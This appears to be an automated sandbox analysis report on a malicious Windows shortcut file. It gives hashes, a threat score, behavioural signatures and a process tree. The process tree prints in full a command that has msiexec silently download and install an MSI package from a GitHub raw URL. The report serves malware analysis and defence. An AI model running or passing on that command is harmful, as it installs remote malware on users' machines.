Analysis
-
max time kernel
121s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
21/02/2025, 03:07
Static task
static1
Behavioral task
behavioral1
Sample
5c2213dfe07175eabf7ae8950609569f93bae26019a7c84741b611a96784e1a8.lnk
Resource
win7-20240903-en
6 signatures
150 seconds
Behavioral task
behavioral2
Sample
5c2213dfe07175eabf7ae8950609569f93bae26019a7c84741b611a96784e1a8.lnk
Resource
win10v2004-20250217-en
21 signatures
150 seconds
General
-
Target
5c2213dfe07175eabf7ae8950609569f93bae26019a7c84741b611a96784e1a8.lnk
-
Size
1KB
-
MD5
8dbf4ab21c88acc16ba80e2e7e38b7a1
-
SHA1
d7799dcface5716afa2897e0ab29bd3dc1293f7c
-
SHA256
5c2213dfe07175eabf7ae8950609569f93bae26019a7c84741b611a96784e1a8
-
SHA512
01244a05f3d0c230a1b210168f31e8bbb504dbf064c1c9a4ac8095007469b04f78a343cd5d1f2106e849c82d27a2bf66c28e0cfc5b7364c227950459cb864fed
Score
7/10
Malware Config
Signatures
-
Use of msiexec (install) with remote resource 1 IoCs
pid Process 2676 msiexec.exe -
Blocklisted process makes network request 2 IoCs
flow pid Process 5 2788 msiexec.exe 6 2788 msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 2676 msiexec.exe -
Suspicious use of AdjustPrivilegeToken 34 IoCs
description pid Process Token: SeShutdownPrivilege 2676 msiexec.exe Token: SeIncreaseQuotaPrivilege 2676 msiexec.exe Token: SeRestorePrivilege 2788 msiexec.exe Token: SeTakeOwnershipPrivilege 2788 msiexec.exe Token: SeSecurityPrivilege 2788 msiexec.exe Token: SeCreateTokenPrivilege 2676 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 2676 msiexec.exe Token: SeLockMemoryPrivilege 2676 msiexec.exe Token: SeIncreaseQuotaPrivilege 2676 msiexec.exe Token: SeMachineAccountPrivilege 2676 msiexec.exe Token: SeTcbPrivilege 2676 msiexec.exe Token: SeSecurityPrivilege 2676 msiexec.exe Token: SeTakeOwnershipPrivilege 2676 msiexec.exe Token: SeLoadDriverPrivilege 2676 msiexec.exe Token: SeSystemProfilePrivilege 2676 msiexec.exe Token: SeSystemtimePrivilege 2676 msiexec.exe Token: SeProfSingleProcessPrivilege 2676 msiexec.exe Token: SeIncBasePriorityPrivilege 2676 msiexec.exe Token: SeCreatePagefilePrivilege 2676 msiexec.exe Token: SeCreatePermanentPrivilege 2676 msiexec.exe Token: SeBackupPrivilege 2676 msiexec.exe Token: SeRestorePrivilege 2676 msiexec.exe Token: SeShutdownPrivilege 2676 msiexec.exe Token: SeDebugPrivilege 2676 msiexec.exe Token: SeAuditPrivilege 2676 msiexec.exe Token: SeSystemEnvironmentPrivilege 2676 msiexec.exe Token: SeChangeNotifyPrivilege 2676 msiexec.exe Token: SeRemoteShutdownPrivilege 2676 msiexec.exe Token: SeUndockPrivilege 2676 msiexec.exe Token: SeSyncAgentPrivilege 2676 msiexec.exe Token: SeEnableDelegationPrivilege 2676 msiexec.exe Token: SeManageVolumePrivilege 2676 msiexec.exe Token: SeImpersonatePrivilege 2676 msiexec.exe Token: SeCreateGlobalPrivilege 2676 msiexec.exe -
Suspicious use of WriteProcessMemory 5 IoCs
description pid Process procid_target PID 808 wrote to memory of 2676 808 cmd.exe 31 PID 808 wrote to memory of 2676 808 cmd.exe 31 PID 808 wrote to memory of 2676 808 cmd.exe 31 PID 808 wrote to memory of 2676 808 cmd.exe 31 PID 808 wrote to memory of 2676 808 cmd.exe 31
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\5c2213dfe07175eabf7ae8950609569f93bae26019a7c84741b611a96784e1a8.lnk1⤵
- Suspicious use of WriteProcessMemory
PID:808 -
C:\Windows\System32\msiexec.exe"C:\Windows\System32\msiexec.exe" /i https://github.com/leinchchanceleinch/jik/raw/refs/heads/main/d.msi /qn2⤵
- Use of msiexec (install) with remote resource
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of AdjustPrivilegeToken
PID:2676
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
PID:2788